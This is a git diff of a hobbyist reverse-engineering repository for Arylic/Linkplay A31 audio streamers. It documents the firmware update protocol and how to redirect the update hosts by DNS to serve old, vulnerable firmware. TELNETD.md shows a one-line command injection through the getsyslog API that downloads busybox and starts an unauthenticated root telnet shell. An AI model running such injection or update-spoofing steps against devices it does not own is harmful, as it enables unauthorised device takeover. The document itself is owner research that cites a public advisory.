diff --git a/Downgrade.md b/Downgrade.md
new file mode 100644
index 0000000..1409f68
--- /dev/null
+++ b/Downgrade.md
@@ -0,0 +1,224 @@
+# Downgrade Firmware
+In recent versions Arylic has fixed several vulnerabilities and I have not found a way to "hack" into the CLI anymore. Telnet acces was still possible with version 4.2.8020 from 2020/02/20 (20th of Feb 2020) that was installed when I had bought the first devices.
+
+The following information is specific for Arylic Up2Stream Amp v2 and Up2Stream Pro v3, but might also help for other devices.
+
+## Firmware Upgrade
+Before we are able to downgrade the software, it is important to understand the firmware upgrade process.
+
+The URL to the upgrade server can be retrieved via API:
+```
+curl http://10.1.1.52/httpapi.asp?command=GetUpdateServer
+# my device responds with http://silenceota.linkplay.com/wifi_audio_image
+```
+
+With Wireshark I have sniffed how the upgrade process is working and which files are required. At first the device gets a list of all (or many) Linkplay products
+```
+curl -O http://silenceota.linkplay.com/wifi_audio_image/products.xml
+```
+The XML file contains a list of products with their ID and some information including an URL for specific information. The example contains the two devices listed above (list was retrieved in Oct 2020):
+```
+
+...
+
+RP0011_WB60
+WiiMu-A31
+FF31F09E
+
+http://ota.rakoit.com/release/RP0011_WB60/product.xml
+
+
+
+...
+
+```
+
+The following table lists some of the IDs
+| Product ID | Description |
+| --------------- | ------------- |
+| RP0011_WB60 | Arylic WiFi and Bluetooth 5.0 HiFi Stereo Amplifier Board Up2Stream amp 2.0 |
+| RP0011_WB60_S | Arylic A30 Pro |
+| RP0016_S50PRO_S | Arylic S50 Pro |
+| UP2STREAM_PRO_V3 | Arylic Up2Stream Pro v3 |
+
+```
+curl -O http://ota.rakoit.com/release/RP0011_WB60/product.xml
+```
+The example was downloaded in Oct 2020:
+```
+
+
+ 20201026
+ cfcf8f10e461c886ef39212d666b5492
+ http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/md5.txt
+ http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/MVver_20201026
+ http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/layout
+ http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/uboot_v632.img
+ http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/backup_new_v1141.img
+ http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/a31rakoit_new_uImage_20201026
+ http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/user.jffs2
+ http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/user2.jffs2
+
+ RP0011_WB60
+ 24
+ 672498
+ http://ota.rakoit.com/release/RP0011_WB60/RP0011_WB60-0024-99617ee3-08182020.mcu.bin
+
+
+```
+The URLs include a "random" ID that might be mapped to the product ID and a subdirectory with the version (date) for some files. The MCU files follow a different structure with the product ID used as a subdirectory and a version number that is included in the name of the image.
+| XML ID | Subdirectory | Description |
+| --------------- | ------------- | ------------- |
+| | | plain text file with MD5 checksums for image files (uBoot, backup, user2, kernel) |
+| | | plain text file with version information and release date |
+| | | plain text file with layout (e.g. offset, size, version, fstype, name, size) of file system in flash (user2, user, kernel) |
+| | | main binary image for kernel |
+| | | image for user file system (persistent) |
+| | | image for user file system (persistent) |
+| | - | boot loader uBoot |
+| | - | backup image |
+
+I'm not sure if the **** tag is used. I've modified the URLs (different FQDN and path) and got no error. Only the following files are downloaded during an upgrade (verified with Up2Stream Amp v2.0):
+| URL | Description |
+| --------------- | ------------- |
+| http://silenceota.linkplay.com/wifi_audio_image/products.xml | List of all Linkplay products in XML format with infos and URL |
+| http://ota.rakoit.com/release/RP0011_WB60/product.xml | Infos and URLs for images for a specific Linkplay product |
+| http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/MVver_20201026 | Version information |
+| http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/layout | Layout of file system in flash |
+| http://silenceota.linkplay.com/wifi_audio_image/2ANRu7eyAEYtoo4NZPy9dL/20201026/a31rakoit_new_uImage_20201026 | main image |
+
+The other images, e.g. uBoot loader (was already installed), user and user2 images were not downloaded.
+
+> **Note:**
+> If an upgrade is available, it may be installed automatically without any notice! In the 4Stream app you might see that a new version is highlighted with "new" and you might get a popup with a notification. I have not found out, when an update is installed automatically.
+
+## Firmware Downgrade
+To be able to downgrade the firmware you need to modify DNS names, e.g. you may install dnsmasq on your local network and point to that DNS server from your DHCP server. To redirect the firmware up-/downgrade process to your own webserver, you can create a simple file in the /etc/dnsmasq.d directory with the following content (10.1.1.22 is the IP address of my webserver located on my MacMini)
+ The following records are required on the DNS server:
+```
+cat /etc/dnsmasq.d/linkplay.conf
+address=/silenceota.linkplay.com/10.1.1.22
+address=/ota.rakoit.com/10.1.1.22
+```
+You may modify the configuration file on your webserver to use different folders for different FQDNs. Be sure to verify any URLs from a web browser or curl. On your PC you may manually point to a public DNS server to be able to download XML files and images from the Internet.
+
+> **Note:**
+> The modification of the two FQDNs will prevent any further updates!
+
+A firmware downgrade has been tested from v4.6 to v4.2.8026 (release date 20200220). Here it is documented from v4.2.8826 to v4.2.8026. To get information about the product ID (project), the current version and release date you can use the "getStatusEx" command. The following output is "enhanced" / beautified with the tool "jq" (JSON processor):
+
+```
+curl -s 'http://10.1.1.52/httpapi.asp?command=getStatusEx' | jq
+{
+ "language": "en_us",
+ "ssid": "SoundSystem_305D",
+ ...
+ "firmware": "4.2.8826",
+ "build": "release",
+ "project": "RP0011_WB60_S",
+ "priv_prj": "RP0011_WB60_S",
+ "project_build_name": "a31rakoit",
+ "Release": "20201026",
+```
+
+At first you have to download the following XML files, install them in the appropriate directory on your webserver (you may keep the path and create the directories as required).
+
+> **Important:**
+> There is no link to older version available. The **_products.xml_** file only contains URLs for the latest version, so you need to know (or guess) the URL for the specific **_product.xml_** file. The following URL is working for the Up2Stream Amp v2 and partially also for the Up2Stream Pro v3 (without MCU). I've added the URL for the **_products.xml_** file to the Wayback archive (https://web.archive.org) on Dec 31th 2023, so it does not work for older versions.
+
+The **_products.xml_** file that has been archived on 20231231 can be retrieved here:
+```
+curl https://web.archive.org/web/20231231141235/http://silenceota.linkplay.com/wifi_audio_image/products.xml
+```
+
+At first you can download the actual **_products.xml_** file, remove everything except your products, adjust the URLs (optionally) and install it on your web server:
+```
+curl -O http://silenceota.linkplay.com/wifi_audio_image/products.xml
+```
+
+Next you download the specific **_product.xml_** file. The following URL is for the RP0011_WB60_S product ID, but except for the MCU all images look to be the same as for product ID RP0011_WB60, UP2STREAM_PRO_V3, and others. I'm not sure, but all devices with the Linkplay A31 module might use the same firmware. You may download and compare the RP0011_WB60_S product below with your device (including MD5 checksums) and replace MCU part show below with the one from your device. It looks that older versions of the **_product.xml_** files and images are still available for download - you just need to know (or guess) the URLs.
+
+> **Important:**
+> I do not take responsibilities for results or consequences. You might damage your device! Do not try to downgrade your device if you are unsure!
+
+The following URL is for the RP0011_WB60_S product ID, version 4.2.8020, release date 0200220
+```
+curl -O http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/product.xml
+```
+
+Here is a copy for reference:
+```
+
+
+ 20200220
+ 27178fb574eafbdab8e1493a1569dd36
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/md5.txt
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/MVver_20200220
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/layout
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/uboot_v632.img
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/backup_new_v1141.img
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/a31rakoit_new_uImage_20200220
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/user.jffs2
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/user2.jffs2
+
+
+
+RP0011_WB60_S
+0022
+670246
+http://silenceota.linkplay.com/wifi_audio_image_mcu/RP0011_WB60_S/RP0011_WB60_S0022.mcu.bin
+
+
+```
+
+Modify the in the **_product.xml_** file to be one day ahead of your current release date, e.g. 20201027 if your current release date is 20201026. You may also combine the content with a different MCU (project). Be sure that the project name is exactly matching your device!
+```
+
+
+ 20201027
+ 27178fb574eafbdab8e1493a1569dd36
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/md5.txt
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/MVver_20200220
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/layout
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/uboot_v632.img
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/backup_new_v1141.img
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/a31rakoit_new_uImage_20200220
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/user.jffs2
+ http://silenceota.linkplay.com/wifi_audio_image/drPb6dKCSrFvPiYD8tJiqe/20200220/user2.jffs2
+
+ RP0011_WB60_S
+ 0022
+ 670246
+ http://silenceota.linkplay.com/wifi_audio_image_mcu/RP0011_WB60_S/RP0011_WB60_S0022.mcu.bin
+
+
+```
+Download and install all files from the list above on your web server.
+
+Modifiy the version number in the **_MVver_20200220_** file (first line) to be higher than your current version number, e.g. WiiMu.4.2.8027 if your current version is 4.2.8826.
+
+Modify the release date in the **_MVver_20200220_** file (6th line) with the same date used in the previous step.
+
+Here is an example of the modified **_MVver_20200220_** file:
+```
+ WiiMu.4.2.8827
+WiiMu
+WiiMu-A31
+a31rakoit
+release
+20201027
+customuuid=FF31F09E
+```
+Modify the version (ver, 4th column) in the **_layout_** file (4th line) with the same date used in the previous step (here 8827):
+```
+#offset :max_size:min_size:ver:flag:fstype:name:img_size
+00e00000:00200000:00000040:00000000:2:jffs2:user2:00200000
+00d80000:00080000:00000000:00000000:2:jffs2:user:1
+00250000:00b30000:00000040:00008827:0:null:kernel:8533256
+```
+
+Trigger an update with the following commands and verify the progress with Wireshark running on your web server. You may use "http" as a filter to see the downgrade process:
+```
+curl -s 'http://10.1.1.52/httpapi.asp?command=getMvRemoteUpdateStartCheck
+curl -s 'http://10.1.1.52/httpapi.asp?command=getMvRemoteUpdateStatus
+```
diff --git a/Hardware.md b/Hardware.md
index b464763..4e2904a 100644
--- a/Hardware.md
+++ b/Hardware.md
@@ -21,6 +21,7 @@ VCEI exceptions : not available
Here are some useful links go get more information about the hardware:
https://openwrt.org/docs/techref/hardware/soc/soc.mediatek
https://openwrt.org/docs/techref/instructionset/mipsel_24kc
+https://www.linkplay.com/modules-wi-fi-2
There is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need:
https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/
@@ -29,7 +30,7 @@ https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/
The binaries are included in packages, so you have to find out which packages includes a specific binary. A list of packages can be found here: https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/Packages
-Here's an example how to download a package and get the binaries from it for a SSH server (dropbear). The commands were executed from a terminal window on my MacBook:
+Here's an example how to download a package and get the binaries from it for a SSH server (dropbear). The commands were executed from a terminal window on my MacMini:
```
cd ~/Downloads
@@ -70,7 +71,7 @@ dropbear -r /tmp/rsa_host_key
```
Log in with ssh from remote by using username admin, password admin
-I tried to install a sftp server on my Up2Stream device to be able to add the file system via sshfs from my MacBook, but it's not working so far. Here are the commands that I've used:
+I tried to install a sftp server on my Up2Stream device to be able to add the file system via sshfs from my MacMini, but it's not working so far. Here are the commands that I've used:
```
cd ~/Downloads
curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/packages/openssh-sftp-server_7.1p2-1_ramips_24kec.ipk' -o openssh-sftp-server_7.1p2-1_ramips_24kec.ipk
@@ -90,7 +91,7 @@ wget -O /tmp/bin/sftp-server -T 5 'http://10.1.1.22/a31/sftp-server'
chmod 777 /tmp/bin/sftp-server
```
-Goal was to mount the Up2Stream device on my MacBook with sshfs:
+Goal was to mount the Up2Stream device on my MacMini with sshfs:
```
sshfs -C -o volname=up2stream -p 22 -o allow_other -o sftp_server=/tmp/bin/sftp-server admin@10.1.1.52:/ ~/Volumes/up2stream
```
diff --git a/README.md b/README.md
index a6754f4..813353a 100644
--- a/README.md
+++ b/README.md
@@ -19,12 +19,13 @@ Reverse Engineering by Crymeiriver:
https://github.com/Crymeiriver/LS150/blob/master/README.md
## Enable telnetd
-To get started exploring these devices, a security vulnerability had to be exploited to install a telnetd.
+To get started exploring these devices, a security vulnerability had to be exploited to install a telnetd. [Enable telnetd](/TELNETD.md)
## Hardware and Firmware
-More information about the hardware
+More information about the hardware and Firmware, file systems, including information how to add binary files the device. [Hardware and Firmware](/Hardware.md)
-##
+## Reverse Engineering
+Information about the boot process, file systems including environment (NVRAM). [Reverse Engineering](/boot-process.md)
## Downgrade Firmware
-The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020). That version still has some vulnerabilites to be able to get onto the CLI with telnet by pushing a single command to these devices. Although it is good when the vendor is providing upgrades with additional feature and security fixes, I'd still like to be able to "hack" into the CLI. Therefore I had to downgrade the firmware.
+The first version on my devices was 4.2.8020 from 2020/02/20 (20th of Feb 2020). That version still has some vulnerabilites to be able to get onto the CLI with telnet by pushing a single command to these devices. Although it is good when the vendor is providing upgrades with additional feature and security fixes, I'd still like to be able to "hack" into the CLI. Therefore I had to downgrade the firmware. [Downgrade Firmware](/Downgrade.md)
diff --git a/TELNETD.md b/TELNETD.md
index 2aa63b5..bfd9fb9 100644
--- a/TELNETD.md
+++ b/TELNETD.md
@@ -3,7 +3,7 @@ To enable telnetd on these devices, a security vulnerability had to be exploited
The command that has this vulnerability is **_"getsyslog"_**, see https://developer.arylic.com/httpapi/#get-system-log and https://labs.withsecure.com/advisories/linkplay-firmware-wanlan-remote-code-execution. The command has an option to add an IP address from a slave device, e.g. **_"getsyslog:ip:10.1.1.90"_**, so a CLI command is executed on the device to retrieve the system log from the slave device that includes the IP address. Instead of just having an IP address as a parameter, that CLI command can also include a ";" and a second CLI command. You do not even have to provide an IP address, but can append the ";" and second command directly after the ":ip:".
-The following code snippets are using the IP address 10.1.1.52 for my Arylic Up2Stream Pro v3 device and 10.1.1.22 for a web server running on my local MacBook.
+The following code snippets are using the IP address 10.1.1.52 for my Arylic Up2Stream Pro v3 device and 10.1.1.22 for a web server running on my local MacMini.
```
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash";
```